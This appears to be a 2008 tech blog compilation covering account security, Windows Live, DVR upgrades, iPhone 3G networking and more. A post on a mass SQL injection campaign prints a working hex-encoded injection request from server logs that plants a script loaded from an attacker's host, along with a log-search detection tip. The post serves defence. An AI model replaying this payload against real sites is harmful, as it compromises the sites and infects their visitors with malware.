Require security changes to take place out of band - One option, probably quicker and less expensive to implement than physical tokens, is using something like an automated telephone call or text message to require the owner of the account to verify a change should be allowed. By registering one or more phone numbers when the account is created and requiring a unique secret be provided via that channel to authorize a change, one can sufficiently secure the account. Vidoop uses a system like this for resetting information on their OpenID accounts. It's simple and it works. It requires me to have the correct device (my phone), uses a different communication channel (the phone network, hence "out-of-band") to contact me and then verifies I am a legitimate user. It requires me to interact as part of any change.

But the technology options get even better: JanRain's myOpenID, for example, now has a feature called "CallVerfID" that equips your myOpenID for two-factor authentication via the phone. It's quick and easy to set up and instantly protects every login with a multifactor authentication mechanism. I found I was not able to use it with a couple phone services due to the way they answer the call (I should provide feedback about that, added to my to-do list), but when set up for my cell or home phone it works as advertised.

Expect more of this class of technology in the future. Think, for example, about voice biometrics: Is that really you that's answering your phone? That kind of technology would be very cool if it was reliable. It's a complicated but useful technology that's being refined even as we discuss this.

I would guess that "review of all Internet email accounts" has been added to every campaign manager's list of things to do deal with early in the vetting process (not to mention the Secret Service's list). Any of the technologies above would likely have prevented the malicious bad guy from accessing the Yahoo! email account.

In the security world, change only happens when enough people make enough noise, a regulator gives an order, or enough companies feel enough financial pain. This looks like one of those cases where noise is the better option. It's certainly better than regulatory mandates (which tend to create collateral damage), and waiting on big companies to suffer is not exactly a reliable plan.

So... Feeling okay? How safe is your account, really?

The third wave of official beta apps under the Windows Live name have been made available a bit early for download. Full information and download links are located over at liveside.net. The updated Windows Live apps are:

• Messenger v9
• Windows Live Movie Maker
• Mail with Calendar synchronization
• Writer
• Photo Gallery
• Family Safety
• Outlook Connector

There are also non-English versions listed on the site and a few individual reviews posted at liveside.net:

• Wave 3: Windows Live Movie Maker Beta
• Wave 3: Windows Live Mail - Calendar, Calendar, Calendar (and more)
• Wave 3: Windows Live Writer – A First Look
• Wave 3: Windows Live Messenger 9 Beta – What’s New- A Comparison With 8.5

The most noticeable change is a whole new UI scheme for the apps, but there are a number of other changes in there, as well. Messenger's look and feel is very different. I see Live Writer now has direct YouTube integration - nice move and probably one that took some serious discussion to make happen (understandably). Time to start digging in and seeing what else the new apps offer under the hood.

The latest version of SQL Server implements several object models through Powershell to let folks manage SQL Server without using the SQL management tools.

We've just published a new episode of the RunAs Radio podcast with Michiel Wories, in which we dive into SQL Server 2008's Powershell features. Michiel is certainly the one to know and share about these features: He joined Microsoft 7 1/2 years ago in the role of Senior Program Manager for Microsoft SQL Server and is currently working as a Principal Architect on defining the next generation SQL Server management platform infrastructure. Michiel's blog is at http://blogs.msdn.com/mwories/

RunAs Radio is a weekly Internet-audio talk show for IT Professionals presented in a high-quality podcast format. Since April 2007 RunAs Radio has brought experts in the field of IT to its 10,000+ listeners, to inform and entertain. Professionally produced interviews are about 30 minutes in length and pack a substantial amount of information for maximum benefit. For more information about RunAs Radio, visit http://www.runasradio.com. RunAs Radio is available on iTunes and the Zune Marketplace, as well as directly from the RunAs Radio web site.

I enjoy the fact that my DirecTV DVR (model HR21-200) records HD content for me. The quality is generally pretty darned good (it does 1080p video now after a recent a software upgrade), and it beats the heck out of anything else available to me in the boonies. The unit comes equipped with a 320GB (give or take) internal drive, which allows something like 30 hours max of HD recording. I found that when recording full seasons of a few shows like The Office or Lost in HD (and most of us will tend to add a few HD movies in the mix), the drive tends to fill up before I want it to.

So, I ordered a Cavalry 1TB external eSATA/USB 2 drive from Newegg.com, which arrived today. I've hooked it up and it's working. My new capacity numbers? Well, it depends on the specific content, but up to about 145 hours of HD content or as much as 1000 hours of SD programming (wow). Variables that affect actual video-time capacity includes resolution, compression (MPEG2 uses more space than the newer MPEG4) and how much motion there is in the video (since more motion means less compression benefit).

I wanted to document the simple setup steps here, so people can get theirs to work if they should want to do the same thing. You can find similar info on the 'net, but people seem to have a hard time with it. My drive came pre-formatted NTFS, which is fine. The DVR will wipe any file system on whatever drive you hook up. Below are the steps that one needs to follow in order to get the external drive up and running with the DVR. The order of the steps is crucial. Don't try to power up your hard drive after you start the DVR, for example.

First of all, if your external SATA drive is a Seagate FreeAgent, you will probably not have any luck, unless you have a HR20 DVR unit. I've heard many stories from people who bought a FreeAgent drive and tried to attach it, with no luck. So, while the FreeAgent drives are great for gneral storage, they are probably not what you want to buy to attach to your DirecTV receiver. My HR21-200 unit simply refused to work with my 750GB Seagate drive, so it's doing video editing duty now. Your mileage may vary, but my experience is that they just don't work.

To start using your new hard drive:

1. Power down the DVR.
2. Unplug the DVR from the wall power. This is important.
3. Attach the external drive's eSATA cable to the back of the DVR unit.
4. Power up the external hard drive first, and allow it to "spin up" (give it about a minute to be safe).
5. After the hard drive has "spun-up," plug the DVR back into the wall power plug.
6. Be patient (very patient) and wait for the DVR to restart. It's not dead. Be patient.
7. After it does it's thing, you'll be able to watch TV again. Check your recorded items list and make sure it's blank.
8. Run a recording test and make sure you can play back.

Note that the DVR's internal drive is completely bypassed when you add a new external hard drive - the system no longer sees it. So your recordings and what-have-you from the internal drive will not be available to view. However, in my experience if you restart the DVR without the external drive attached the internal drive "comes back to life" and you'll see your old recordings there.

Any scheduled recordings on your "To Do List" that you set up before adding the external hard drive will no longer be programmed. This is important - You will need to set up your recording schedules again. Head over to DirecTV's online scheduler or their mobile scheduling site at http://m.directv.com and sign in to start setting things up. I sometimes find the mobile site to be a bit easier to use, even on a desktop or laptop PC - especially since it lets me search by name.

Also, note that whatever you set up online may not be configured using the default recording setting you've established on your receiver, so be sure to go to the receiver's Manage Recordings list and review the new items that appear in your To Do list to make sure they're set to what you want. In my case, I had to make changes. Seems like recordings scheduled online should use the defaults you've established on your machine, but they didn't for me.

Most importantly, you can look for good deals on decent external eSATA hard drives to do an inexpensive upgrade to your DVR. If you like spending lots of money, you could go to one of the sites that offers upgrade hardware services, but one such site sells essentially the same drive I bought and installed myself. Their price? $299.00, and that's just for the hardware. If you want your internal drive copied to the new drive, they can do that for an additional $59 - Not worth it to me.

How much did I pay for mine? $167.00 from Newegg. You can do the math. Shop around, prices are even lower now, and you can find an even better deal out there.

Over at Wired's Gadget Labs blog, Brian Chen writes about information discovered during a webcast presentation on Thursday covering the recently discussed iPhone security weaknesses having to do with bypassing the password-protected lock screen.

Jonathan Zdziarski, a data forensics expert and author of the forthcoming book "iPhone Forensics," did the presentation for law enforcement personnel and anyone else who might have a need to access an iPhone to discover information. During the presentation, in which he outlines a method for breaking into the phone with modified firmware and some hairy manipulation, he also showed how the iPhone takes a screenshot of every application the iPhone's user closes by pressing the "home" button. The saved image is used to "draw" the collapsing screen animation you see when your application closes and you're returned to the home screen. The image file is then deleted from the iPhone's storage.

But, nothing is ever really completely "deleted." And in this case, apparently when the temporary image file is killed from storage, the data "on-disk" is not overwritten or otherwise cleaned, so anyone with some basic forensics knowledge can search the iPhone storage space for the old files and recover them easily. You can do the same thing on pretty much any computer.

Depending on your point of view, this is either a potential privacy issue or a great forensics feature. Having worked as both a police officer and as a business security professional responsible for privacy and data integrity issues, I can understand both arguments. Certainly as a cop, being able to dig into someone's iPhone (with a proper warrant of course) to find evidence of crimes where the phone was used in some manner is of real value, and screen shots are potentially pretty useful evidence. But as a person who also values privacy as a matter of basic principle, it's a little disconcerting, especially since I didn't realize until today screen shots are being made.

The webcast recording is not yet available as of the time of this writing, but it should be posted to http://www.youtube.com/OreillyMedia in the next few days. If you're interested in learning something about electronic data forensics, it will be worth the time to check it out. Here's the O'Reilly abstract from the session:

In this free, live webcast, iPhone hacker and data forensics expert Jonathan Zdziarski guides you through the steps used by law enforcement agencies to bypass the iPhone 3G's passcode lock by creating a custom firmware bundle. Author of the upcoming book, iPhone Forensics, Jonathan has devoted much of his talent supporting law enforcement personnel with his development of a forensics toolkit that allows them to recover, process, and remove sensitive data stored on the iPhone, iPhone 3G, and iPod Touch. This live presentation is aimed towards law enforcement and anyone else who has a need to access the not-so-readily available data on an iPhone.

Jeff Goodwin Rings Us Into Unified Communications
RunAs Radio Show #73 - 9/3/2008 (35 minutes)

Richard and I talked to Jeff Goodwin about Microsoft Unified Communications in this week's RunAs Radio show. Jeff lays out the relationship between Exchange, Office Communicator and Unified Messaging Server to combine email, telephone and instant messaging. Check out Jeff's TechNet articles at http://www.shrinkster.com/11mj and http://www.shrinkster.com/11mk.

UPDATED: Chrome is now out and available for Windows, other platforms coming in the future - Check out http://www.google.com/chrome/

As mentioned earlier here and everywhere else on the 'net, Google's Chrome web browser is coming. Today Google put an official release notice on its Official Google Blog, and they tell us it will be made available for you and me to download and try on Tuesday.

Over at Google Blogoscoped there's a whole bunch of screen shots you can check out if you can't wait until tomorrow. Screen shots are a bit hard to come by today, but tomorrow it'll be in-person for everyone, and you can probably imagine how many people will be posting pictures and writing about the new browser.

Google seeded a paper comic book to some people recently, to present and describe their future web browser (or you might just think of it as the web browser of the future), which is called Google Browser or Chrome.

So, what's the story? Making the browser more stable, more usable, more secure. At first glance, it looks like a strong starting point for the future of Internet browsers. Written from the ground-up from scratch and with the experience of several years of past browser platforms to learn from, Google has addressed many of the main concerns in today's browsers.

Now the only question is: When will we get it? I will be watching here to see if something shows up. Hopefully it's soon!

UPDATE: The release date is tomorrow (Tuesday, September 2, 2008) - More info and link to screenshots here.

A variety of technologies are incorporated into the Chrome design that improve on common browser weaknesses. The key improvements fall into the areas of stability (memory allocation and management, process management), some incredibly cool javascript environment enhancements (in the form of a new, open-source javascript engine), a bunch of user experience improvements and significant security changes.

And, it's all open source. That's right - Anyone (including other browser makers) can leverage the work done in the Chrome project and can contribute or modify to meet their own needs. Good move, Google.

Pretty exciting stuff. It will be fun to see what comes next, and when.

As mentioned the other day, LinkedIn today released their new Groups features. Groups are one of the most popular features on LinkedIn, despite the limited feature-functionality provided for groups on the web site in the past.

The new features include a searchable contacts roster (search by name, company, or other keywords such as specific areas of expertise), which is accessible to all members; and discussions with email-digest notifications (which are configurable by individual group members). A few screen clips of the new functionality are shown below, and LinkedIn has published an informational page describing the new functionality.

Notification when you sign in that your managed group now has new features:

The new tabs available reflect the new functionality:

Choose your notification email delivery preferences for discussions:

Write a new discussion topic for the group:

Recent discussions list:

Vidoop Labs has a dream:

The dream is to see Identity baked into all browsers. Just imagine opening your web browser and then selecting your Identity Provider (IDP) the way you select your default search provider. The benefits are numerous; never type in a username, never look for a login button/page (you are authenticated when you land on a domain), no phishing/MITM (the browser can do domain and SSL cert validation). You fire up your browser and authenticate (or login) similar to the way you log in to your computer every time you turn it on. The difference is you get to choose your provider and can take control of the data you safeguard, store and share on the Internet.

I could get into that.

Vidoop is a Portland, Oregon company that has built some interesting technology around OpenID. I really like the idea of OpenID, and I have a couple OpenIDs of my own that I use on various sites. But OpenID is not exactly perfect. It's still relatively young, and from the usability standpoint it needs improvement. The identity and authentication requirements of the modern Internet demand some additional features and capabilities that OpenID doesn't deliver (and you can argue that it shouldn't). By combining openID with other technologies (such as Information Cards and other strong-auth offerings) and improving usability for end-users, it could become a widely-adopted, used and trusted standard, or part of a broader one covering strong authentication and identity protection/assertion in a commonly-accepted and deployed package.

Vidoop's Luke Sontag today posted an announcement that the company's newly-formed Vidoop Labs has fired up a community project called IDIB (pronounced "Eye-Dib"), which aims to improve on the OpenID usability model and make it stronger at the same time. They've released a developer preview of IDIB in hopes of involving people and getting your input and feedback.

From the Vidoop announcement:

Over the past few years we’ve seen the adoption of OpenID continue to increase but the work that we’ve done as a community to develop this technology has only just begun. Looking at the landscape of OpenID adoption, its clear that there are several key factors inhibiting adoption, but two that we want to focus on today, namely usability and security in the browser.

It was almost two years ago when the Firefox 3.0 roadmap wasannounced and OpenID was mentioned as a new component to the platform. The Mozilla Firefox team looked to members of the OpenID community to step up and provide guidance on what exactly we imagined identity in the browser looking like, but we failed to mobilize and answer their call.

In light of that missed opportunity, Vidoop Labs has been working hard over the last several weeks to produce a prototype that we intend to use to initiate a wider discussion about OpenID in the browser and what it might look like.

And the current developer preview (which is open-source) is just a beginning. Imagine leveraging Information Cards (such as one would use with Microsoft's CardSpace, or the similar open-source offerings for Mac and Linux) in the cloud, and being able to use OpenID - one logon for all your web sites - confidently, securely and with proper security protection.

The Internet needs a good, strong, reliable, usable and secure standard technology to solve the issues related to user names, passwords, single sign on and identity protection. IDIB looks like a serious and positive attempt to start the journey directly down that path.

I thought I'd present some casual observations I made throughout the day Wednesday on a trip from Portland to Seattle, as well as some newly reported information about the AT&T 3G network that's hit the 'net over the past 24 hours or so.

The back-story here is that I - like many others - have found the reliability and consistency of the iPhone 3G to be less than satisfactory while on the 3G AT&T network.

First of all, it became clear to me over the course of several hours yesterday that the iPhone is not to blame with regards to connectivity on the 3G network. While driving from Portland, Oregon to Seattle, Washington and back yesterday, I had the opportunity to run a whole slew of speed/connectivity test sessions using the iPhone app called "iNetwork Test" (click here to get the free app in the iTunes App Store).

AT&T actually has fairly impressive 3G network coverage from south of Olympia, Washington practically all the way to Seattle, with one or two small gaps in-between where the phone switched to EDGE. Much of the area along that I-5 corridor is rural or sparsely-populated. From a wireless connectivity standpoint, it's a pretty decent area to live in if you're going to be far away from the city.

My experience in using the 3G network along my drive up and down the Interstate can be summed up thusly:

In areas with higher population density, and thus more iPhone (and other device) users, ability to a) connect to the voice network and make calls, b) stay connected to the voice network, c) make data connections and d) maintain data connections was substantially worse. The difference between dense and sparsely populated areas was like night and day.

Where population density was lower, even in cases when fewer bars are displayed on the signal strength icon, voice and data connections were reliable and solid without exception. In contrast, in high-population areas even full-signal connectivity was spotty and unreliable.

I'm running the latest iPhone software, v2.0.2, which both Apple and AT&T have encouraged people to upgrade to. AT&T even sent a text message to all users asking them to upgrade - a first-time action on the part of the carrier.

Some new information, part of which you'll find quoted below, helps explain why I experienced substantially poorer performance in the cities and heavily-populated areas but not in the rural sections of my drive. According to reports, it appears AT&T's 3G radio systems are power-constrained, and are not able to maintain all the connections. The incredible number of iPhone 3G devices on the network - especially in metropolitan and urban areas - is most certainly placing a heavy load on the radios. In addition, iPhone 3G devices that have not been updated to the v2.0.2 software are placing an even heavier burden on the radios from a power-consumption standpoint.

So, there's a power-management problem, as well as a capacity problem. When the network "noise" in the radio spectrum used gets to be higher, the towers have to increase power to try to overcome the noise. You can see how that doesn't work. Eventually the noise keeps climbing and the power consumption at the tower (and presumably on the iPhone as well) goes through the roof.

More towers would increase capacity, reduce power requirements and resulting noise, and generally improve coverage. But that's not something that can be changed overnight.

All of this helps explain why my ability to make calls, connect to the 3G data network and download at high speeds was much better where the network is only lightly used.

The Daily Tech site has a detailed report (and some intelligent reader comments) that describes the cell-site power issues, the problems related to the older iPhone 3G software, and other items. Go to the Daily Tech site to get all the details. Here is a portion of the information, including some text quoted from Roughly Drafted Magazine, whose author was able to get some new details from a source inside AT&T's wireless business describing the power issues and what the iPhone's v2.0.2 software update changes:

Basically the update "fixed power control on the mobile" according to the source. To understand what they're going to say next, you must first know a bit about AT&T's jargon for UMTS -- the technology it uses to deliver its 3G network. In the technology, phones are referred to as user equipment, "UE" for short. The base transceiver station towers are known as "Node B".

With this jargon in mind, the AT&T source explains:

"In UMTS power control is key to the mobile and network success. If the UE requires too much downlink power then the base station or Node B can run out of transmitter power and this is what was happening. As you get more UEs on the cell, the noise floor rises and the cell has to compensate by ramping up its power to the UEs. If the UE power control algorithm is faulty then they will demand more power from the cell than is necessary and with multiple users this can cause the cell transmitter to run out of power. The net result is that some UEs will drop their call. I have seen the dropped call graphs that correspond to the iPhone launch and when the 2.0.2 firmware was released. The increase in dropped calls, (were the result of) dropped calls due to a lack of downlink power."

In essence, the iPhone is asking for a stronger signal than it needs. In areas with lots of users, some or all of whose phones are doing this, calls start to get dropped and signal quality drops. This all follows with the conclusions the media had reached -- the problems were somehow correlated to user distribution and seemed puzzlingly to be both with AT&T's network, and with the hardware.

The source continues:

"The power control issue will also have an effect on the data throughput, because the higher the data rate the more power the Node B transmitter requires to transmit. If the UEs have poor power control and are taking more power than is necessary then it will sap the network’s ability to deliver high speed data. This is one of the reasons why AT&T has been sending text messages to users to persuade them to upgrade to the 2.0.2 software. In a mixed environment where users are running 2.0, 2.0.1, and 2.0.2, the power control problems of 2.0 and 2.0.1 will affect the 2.0.2 users. It is not the network that is fault but the interaction of the bad power control algorithm in 2.0 and 2.0.1 software and the network that is at fault. The sooner everybody is running 2.0.2 software the better things will be. Having seen the graphs the 2.0.2 software has already started to make difference."

Since transmitting lots of data takes lots of transmission power, and transmission power was unnecessarily being raised above that necessary for the use levels on phones, the network in areas of heavy use was unable to handle high speed data.

My first-generation Nikon D70, which I bought the day it was released to the market a few years back, died on me a few months ago. Without a card in it, it won't start, and when you insert a CF card in the slot, the green data-access indicator flashes on and off. If I hold down the Menu button, the menu flashes on and off along with the green LED.

As it turns out, this is a known problem with the original Nikon D70 cameras, and Nikon USA has a service bulletin out on the camera body. They'll repair it free of charge.

So, if you have the same problem, visit this service bulletin page, click on the D70, and you can access a PDF file that you'll need to print, fill out and send to Nikon along with your camera body. Be sure to take your camera strap off and remove the battery, and don't send any lenses or other accessories.

Mine's on it's way to Nikon now - they say the turnaround is five days (plus shipping time).

Dear #####,

First, thank you for managing your group on LinkedIn. We sincerely appreciate the time and effort you devote to your members, and we know they value it. Together you have made Groups one of the top features on LinkedIn.

This Friday, we will be adding several much-requested features to your group:

• Discussion forums: Simple discussion spaces for you and your members. (You can turn discussions off in your management control panel if you like.)
• Enhanced roster: Searchable list of group members.
• Digest emails: Daily or weekly digests of new discussion topics which your members may choose to receive. (We will be turning digests on for all current group members soon, and prompting them to set to their own preference.)
• Group home page: A private space for your members on LinkedIn.

We're confident that these new features will spur communication, promote collaboration, and make your group more valuable to you and your members. We hope you can come by LinkedIn on Friday morning to check out the new functionality and get a group discussion going by posting a welcome message.

Sincerely,
The LinkedIn Groups Team

• GP's antenna test found that the iPhone 3G's antenna performs as well as any of the other 3G phones tested.
• The Wired real-world network test found that the networks are often woefully underperforming, and that while speeds are typically faster than EDGE, the ability to connect to a 3G tower might be problematic at best.

I like to listen to my Pandora "stations" in the background while working on my laptop. I get frustrated when I accidentally close the web browser (often its in a hidden tab) or, even worse, click on a link soewhere and Safari, in all it's awesomeness and wisdomness, re-uses the window and kills the audio feed.

In hopes of finding a better way, I started searching for a Pandora widget for the Mac Dashboard (the layover-page that you can put any of a number of downloadable mini-apps on). Unfortunately, I didn't find anything. (Update - turns out there is a widget out there, but it's a memory hog and apparently has a few issues). So, rather than looking for someone else to do the work for me, I started to actually think about a solution I could build on my own.

After about 10 minutes, I remembered the nifty capability in Safari to define a "snipped" portion of a web page and make it a Widget on the OSX Dashboard. You use the little scissors icon in Safari to accomplish this. I started thinking about the Dashboard and how it works, and wondered if there was any way to have Pandora play in the background using a system (the Dashboard, that is) that appears to reload each app every time I launch it.

What the heck, worth a shot, right? Well, I found I could create a web-clip of Pandora's music player that would play my music. No big surprise there. Click on the image to see the widget full-size.

But when I exited the dashboard to go do some actual work, the music would quit.

Bummer.

I got curious though. Maybe someone had thought about the fact that web pages constantly change and play music and whatever else. I did the obvious: I clicked on the little (i) button in the lower right corner of the widget and it took me to the page where I can choose to make the widget look like it's torn from a piece of paper, or whatever. And, lo and behold, right there in the lower left, is a box that makes it appear you can uncheck it and make the audio play in the background, even when dashboard is not active. I've highlighted that box below.

Would it work? I unchecked the box, exited Dashboard, and the music kept on playing in the background. Problem solved! It turns out the default setting is to play web page audio only when Dashboard is active, so you have to toggle the setting to get what you want.

Any other ways to do this? My method works great, but I wonder if someone else came up with a different solution?

Boy Genius says iPhone software v2.0.2 is on it's way out the door this afternoon. In fact, I just checked in iTunes, and there it is.

All 248.7MB of it. The description in the iTunes UI says it contains bug fixes, and that's it. Here's hoping the performance and stability issues - especially related to 3G network performance and switching - are what they fixed in this release. I almost returned my phone the other day out of sheer frustration, and that's saying a lot, really.

Update: After a couple hours of on/off use, apps are notably more stable/snappier (at first I wondered if it was just my imagination, or a fresh restart effect - time will tell), and network performance is better. Where a 3G network with poor or broken signal would be selected before, now a strong EDGE network is selected by the phone. Apps don't seem to hang in places where they reliably (or maybe the better term would be "predictably") hung before the update. For example, the volume controls in almost every app used to not respond for periods of time. Now they work every time. Much less frustrating. There are no real changes in terms of ourward appearance and functionality.

A bunch of IT and web-app teams have lost a lot of sleep lately...

Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).

The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).

Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked, the only common thread is SQL server (despite reports to the contrary).

About data validation...

I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is the cases where you don't realize something should be on the list, or when new threats emerge. Instead, a white-list (or "allow-list") methodology requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default, it's the only safe way to go.

UPDATE: Neil Carpenter mentions in the comments here that he recently posted an excellent blog entry about using parametrized queries in SQL server, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. A layered conbination of both input validation (where it's practical and workable) and paramaterized queries is a good approach, in my opinion.

The attack

Secure Computing's TrustedSource (good site, read it) has some detail about the attack...

You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):

GET /?';DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

Which is a hex-encoded injection that, when translated, creates this SQL statement string (bad-guy address has been removed):

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>

To search your web server logs for any offending lines, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least what's where I have seen them coming from).

How to solve?

First of all, if code like this can get through the web application and into the database, I'd recommend a complete review of the web app from a security standpoint. Basic best-practices for web applications assume that you will trust absolutely no input by default, and then examine all input to see if it is in a format and of a type that is appropriate. And it's very important to recognize that by "input" we mean any type of input vector - whether it be form fields, query string, URI, session data, etc. Input validation should be done on the server side, not just the client side (turning off javascript and manipulating data en-route to the server is pretty easy, after all).

If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and re-write the offending statements to something innocuous. That's a band-aid, but it can help in the short-term with this one particular need. In addition, you could use application-layer firewalls in from of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.

HP recently released a tool that you can use to check for SQL injection vulnerabilities specifically called Scrawlr. You can find it, and related information, here.

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!

If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences.

I'm a rural-living person who often consults people on how to get broadband Internet connectivity to their middle-of-nowhere homes. There's some good news for most of those people. HughesNet, the big guy in the satellite Internet service space operated by Hughes Network systems (no relation), has announced that later this month they will begin offering what they're calling the ElitePremium plan, with download speeds available as fast as 5 megabits per second (mbps). That's up there speed-wise with what many cable companies provide, and is easily a competitor to DSL speed capabilities. It'll be available to order on August 21st.

Satellite Internet has some inherent latency between the time a request is sent and the resulting data is fed to you, since the distance the signal travels, even at the speed of light, is pretty darned far. Many VPN systems have a difficult time on Satellite, also due to the time-shift latency. But the "start" delay is not huge, and once the "faucet is open," 5 mbps is pretty darned fast.

That's about five times the download speed I get on my Internet connection, which is an excellent terrestrial wireless offering from a local provider (which is Cascade Networks, if you happen to live in the Longview, Washington or Columbia County, Oregon areas). An antenna on my roof points at a tower on a mountain about 11 miles away, and that's the option I use.

So, more options and much faster speeds for us non-city-dwellers. Not a bad deal!

Every now and then you'll discover a couple or few smaller apps that work well together, or alongside each other. The type of situation where you get the 2+2=5 effect. Individually both apps are great, but when used together they becomes something even more. "Two great tastes that taste great together," to borrow an old marketing phrase.

That's been the case for me with two iPhone apps - Shazam (iTunes store page) and Pandora (iTunes store page). Today I use them alongside each other. It's my hope that someday they will be able to communicate with each other and share information.

I've written about Pandora here before. It's a web app that happens to have an iPhone client as well, where you can start with music you like and it helps you find more music that fits your taste and style. You create channels, or stations, and the Pandora service selects similar music for your to hear, and you can fine tune as you go.

Shazam is another of those magical "wow" apps for the iPhone. I use it in the car when I hear a song I like. Rarely do I know the name of the song, or even the artist. But as it plays, I just tell Shazam to listen to a 12-second portion of the song (a process called "tagging"). It uploads the resulting data to the centralized service, and back comes all the information about the song - Artist, title, album, everything. It's really amazing, and in my experience 100% accurate. From there you can also find YouTube videos and launch into the iTunes store to buy the music you've tagged.

I'll often take the name of an artist I discover from Shazam and plug the info into Pandora and start listening there. It's a great way to quickly and relatively effortlessly drill down into new music I have never heard before, but it's music that I really like.

Now imagine if you could use Shazam to identify a song and then inside Shazam choose an option to create a channel based on that artist in Pandora. That would be awesome, truly awesome. I have no idea how "possible" it is, but I can hope. :)

On a similar note - meaning various apps that work great together - ReadWriteWeb published an article this past week with a list of apps that complement each other well (including my Shazam/Pandora combination).

My title for this post sort of spins the title of the article I want to point you to, aiming for the positive side of the coin. The article, which is entitled "The Top 5 Reasons Tech Execs Fail," provides a set of bullet-pointed thoughts that can be read as a list of what tech execs need to do in order to succeed. I happen to agree with the authors' assessment.

Here's the short version of Marty Abbott and Michael Fisher's five points, slightly altered to read as a list of positive attributes of a successful tech leader:

5. Ability to Build World Class Team
4. Ability to Execute
3. Ability to Lead/Motivate/Inspire
2. Ability to Manage Operationally
1. Displays and Uses Financial Acumen

The authors point out in their article, "... when technology executives fail, it is not because they lack an individual skill. It is because they lack an an adequate balance of the many technical, operational and leadership skills necessary to make them a complete manager."

I especially appreciated the Mojave Experiment that Microsoft recently shared with the world (where Vista-negative opinions were tested with a "new" version of Windows, code-named Mojave; it was then revealed to the participants after seeing the new version that what they were looking at was actually Vista). I've been using Vista since well before I came onto the market, and I can hardly stand to use WIndows XP computers anymore. Anyhow, check out http://www.mojaveexperiment.com if you haven't seen it, especially if you have a negative opinion of Vista today based on what you've heard from others. (Note: Scientifically speaking, the "experiment" would be badly flawed, but it's a marketing campaign and in that light it's pretty darned smart if you ask me. Plus, I've lost track of how may people who, never having seen Vista yet having a negative perception, decided to upgrade after trying for a couple hours (on my laptop) at my suggestion. With SP1 installed, for the record. Seriously, group think and manipulation goes both directions).

For those of us who are using Vista (or any other OS for that matter), it's nice to be able to fine-tune a computer system so it will perform the way we want it to. For Vista, Microsoft has released a document called Windows Vista Performance and Tuning as part of their Springboard series, which lets users know about a number of tweaks and decisions they can make to make the OS work well for their needs. It also effectively spells out in fairly plain language some relatively complex information.

Windows Vista and SP1 focus on delivering greater performance and overall system responsiveness. By striking a balance between speed and responsiveness, Windows Vista and SP1 deliver a level of performance that has the greatest positive impact on the system’s usability.This guide looks at the following areas of performance improvement:

• Making configuration changes that help a computer feel more responsive when you use it.
• Using hardware to boost the actual physical speed of a computer.
• Making configuration changes that help a computer to start faster.
• Making the computer more reliable may help increase performance.
• Monitoring performance occasionally so that you can stop problems before they get too big.

There are a variety of other guides out there as well, but this one hits a number of important nails on the head that the average computer user can easily understand and use.

Last week we published an interview that Richard and I did on RunAs Radio with my friend and former co-worker, Simon Goldstein. Simon's a real pro and is good at explaining complicated business relationships and processes.

We cover risk management for IT professionals: What is it, what do you need to know, and why does it matter? As with all of our weekly RunAs Radio shows, it's about 30 minutes long and we cover a lot of ground in that time.

RunAs Radio, Show 67 - Simon Goldstein on IT Risk Management (38 minutes)

